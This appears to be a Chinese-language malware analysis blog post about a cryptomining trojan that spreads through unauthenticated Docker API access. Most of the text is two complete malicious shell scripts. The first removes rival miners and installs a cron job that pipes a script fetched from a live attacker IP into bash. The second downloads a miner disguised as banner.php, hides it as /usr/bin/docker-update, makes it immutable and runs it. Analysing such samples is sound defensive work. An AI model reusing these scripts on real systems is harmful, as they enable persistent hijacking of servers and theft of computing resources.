docker挖矿木马 | 虎据龙盘

利用Docker API未授权访问执行漏洞传播挖矿木马，攻击目标端口号为49153

exp攻击成功后,首先下载cron.sh执行.脚本cron.sh，检查并清理其他挖矿进程然后下载并运行自身的挖矿程序,cron.sh地址,代码如下:

#!/bin/sh
LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
  LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
  LDR="wget -q -O -"
fi

crontab -l | sed '/update.sh/d' | crontab -
crontab -l | sed '/logo4/d' | crontab -
crontab -l | sed '/logo9/d' | crontab -
crontab -l | sed '/logo0/d' | crontab -
crontab -l | sed '/logo/d' | crontab -
crontab -l | sed '/tor2web/d' | crontab -
crontab -l | sed '/jpg/d' | crontab -
crontab -l | sed '/png/d' | crontab -
crontab -l | sed '/tmp/d' | crontab -
crontab -l | sed '/zmreplchkr/d' | crontab -
crontab -l | sed '/aliyun.one/d' | crontab -
crontab -l | sed '/3.215.110.66.one/d' | crontab -
crontab -l | sed '/pastebin/d' | crontab -
crontab -l | sed '/onion/d' | crontab -
crontab -l | sed '/lsd.systemten.org/d' | crontab -
crontab -l | sed '/shuf/d' | crontab -
crontab -l | sed '/ash/d' | crontab -
crontab -l | sed '/mr.sh/d' | crontab -
crontab -l | sed '/185.181.10.234/d' | crontab -
crontab -l | sed '/localhost.xyz/d' | crontab -
crontab -l | sed '/45.137.151.106/d' | crontab -
crontab -l | sed '/111.90.159.106/d' | crontab -
pkill -f sysupdate
pkill -f networkservice
pkill -f sysguard
ps aux| grep "sleep 60"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
ps aux| grep "./crun"| grep -v grep | awk '{print $2}' | xargs -I % kill -9 %
pgrep -f ./watchbog | xargs -I % kill -9 %
netstat -antp | grep '108.174.197.76' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '192.236.161.6' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '88.99.242.92' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
pkill -f pastebin
pkill -f 185.193.127.115
crontab -l | grep -e "85.214.149.236" | grep -v grep
if [ $? -eq 0 ]; then
  echo "cron good"
else
  echo "setup cron"
  (
    crontab -l 2>/dev/null
    echo "* * * * * $LDR http://85.214.149.236:443/sugarcrm//.../run | bash > /dev/null 2>&1"
  ) | crontab -
fi

脚本run，会伪装成banner.php的,其实是docker-update ELF文件。run.sh地址,代码如下:

#!/bin/sh

function downloadxmin(){
wget -q http://85.214.149.236:443/sugarcrm//banner.php -O /usr/bin/docker-update
chmod +x /usr/bin/docker-update 2>/dev/null 1>/dev/null
chattr +i /usr/bin/docker-update 2>/dev/null 1>/dev/null
tntrecht +i /usr/bin/docker-update 2>/dev/null 1>/dev/null
}

function startxmin(){
xminpid=`pidof /usr/bin/docker-update` 2>/dev/null 1>/dev/null

if [ -z "${xminpid}" ]; then
    #echo "xmin not running! starting now!"
    /usr/bin/docker-update 2>/dev/null 1>/dev/null
else
	#echo "xmin is running"
	echo " "
fi
}


if [ -f /usr/bin/docker-update ] ; then
	#echo 'xmin found'
	startxmin
else
	#echo 'xmin not found'
	downloadxmin
	startxmin
fi

该地址的其他样本如下: http://85.214.149.236:443/sugarcrm//.../ 截图如下: